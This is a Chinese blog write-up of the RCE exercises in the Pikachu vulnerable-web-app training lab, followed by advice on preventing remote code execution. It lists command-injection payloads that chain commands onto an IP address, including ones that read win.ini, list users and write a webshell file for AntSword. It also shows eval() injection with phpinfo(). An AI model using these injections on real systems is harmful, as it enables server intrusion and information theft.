-
Pikachu靶场--RCE
参考借鉴
pikachu-RCE_pikachu rce-CSDN博客
exec"ping"
输入IP地址查看页面反应
可以在IP地址的后面拼接我们想要执行的命令
127.0.0.1 & ipconfig
127.0.0.1 && type C:\Windows\win.ini
127.0.0.1 | systeminfo
127.0.0.1 && net user
命令连接符
& 命令1和命令2正确都能执行; 当命令1错误命令2正确,只能执行命令2 && 命令1和命令2正确都能执行;命令1错误命令2正确,不能能执行命令2 | 不管命令1正确还是错误,都只执行命令2 || 命令1正确只会执行命令1,命令1错误才会执行命令2
输入:127.0.0.1 & ipconfig
还可以写入一句话木马
127.0.0.1 | echo "" > shell.php
然后可使用中国蚁剑进行连接
exec"evel"
eval():会将符合PHP 语法规范字符串当作PHP代码执行
在执行框中输入单引号,出现报错,证明此处存在eval()函数注入点漏洞
输入:echo(hello);
输入:phpinfo();
该函数主要用于网站建设过程中测试搭建的PHP环境是否正确,很多网站在测试完毕后并没有及时删除,因此当访问这些测试页面时,会输出服务器的关键信息,这些信息的泄露将导致服务器被渗透的风险。
预防RCE
使用白名单:定义一个接受合法命令或代码输入的白名单,只有在此白名单中的命令或代码才会被执行。这个做法可以限定用户只能进行指定的操作,并且可以有效地防止黑客攻击。
安全编码实践:编写安全代码是防范RCE攻击的一个重要手段。开发者应该禁止使用eval()或exec()等不安全的函数,而是使用更安全的函数来处理用户输入。
输入验证:当处理用户输入时,必须进行必要的验证,包括数据类型、格式和长度等。在校验用户输入之后,再将其传递给执行命令或代码的函数。
限制shell运行环境:在PHP的服务器端配置文件中,可以通过限制可执行文件的路径和基本环境变量来减小攻击面。 -
相关阅读:
C++为什么要使用const关键字?
智能音箱,扫地机器人,传感器,窗帘电机等产品有何优点?(上)
一种NIRII荧光增强脂质体及其制备方法和应用
五年数据库专家,深入剖析高性能MySQL架构系统,不来后悔一辈子
机器学习实战—支持向量机
异构AI算力操作平台的架构设计与优化策略
Shell脚本数组
直接插入排序
数据结构上机练习——单链表的基本操作、头文件、类定义、main函数、多种链表算法的实现,含注释
jmeter 线程组
- 原文地址:https://blog.csdn.net/qq_65150735/article/details/139748841